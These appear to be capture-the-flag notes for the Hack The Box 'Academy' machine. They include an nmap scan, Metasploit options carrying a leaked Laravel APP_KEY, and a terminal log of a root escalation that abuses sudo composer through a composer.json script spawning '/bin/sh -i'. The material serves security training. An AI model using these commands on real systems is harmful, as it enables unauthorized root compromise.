# Nmap 7.91 scan initiated Thu Nov 12 18:50:33 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.215 Nmap scan report for 10.10.10.215 Host is up (0.53s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA) | 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA) |_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to http://academy.htb/ 512/tcp filtered exec 901/tcp filtered samba-swat 1002/tcp filtered windows-icfw 1092/tcp filtered obrpd 3914/tcp filtered listcrt-port-2 6666/tcp filtered irc 7007/tcp filtered afs3-bos 7741/tcp filtered scriptview 8222/tcp filtered unknown Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Nov 12 18:57:26 2020 -- 1 IP address (1 host up) scanned in 413.15 second
Name Current Setting Required Description ---- --------------- -------- ----------- APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= no The base64 encoded APP_KEY string from the .env file Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.215 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to target webapp VHOST dev-staging-01.academy.htb no HTTP server virtual host
mrb3n@academy:/tmp$ rm -rf tmp.Q9tCu8rJFu/ mrb3n@academy:/tmp$ TF=$(mktemp -d) mrb3n@academy:/tmp$ echo'{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json mrb3n@academy:/tmp$ sudo /usr/bin/composer --working-dir=$TF run-script x PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 Do not run Composer as root/super user! See https://getcomposer.org/root for details > /bin/sh -i 0<&3 1>&3 2>&3 # id uid=0(root) gid=0(root) groups=0(root) # cd /root # bash root@academy:~# wc -c root.txt 33 root.txt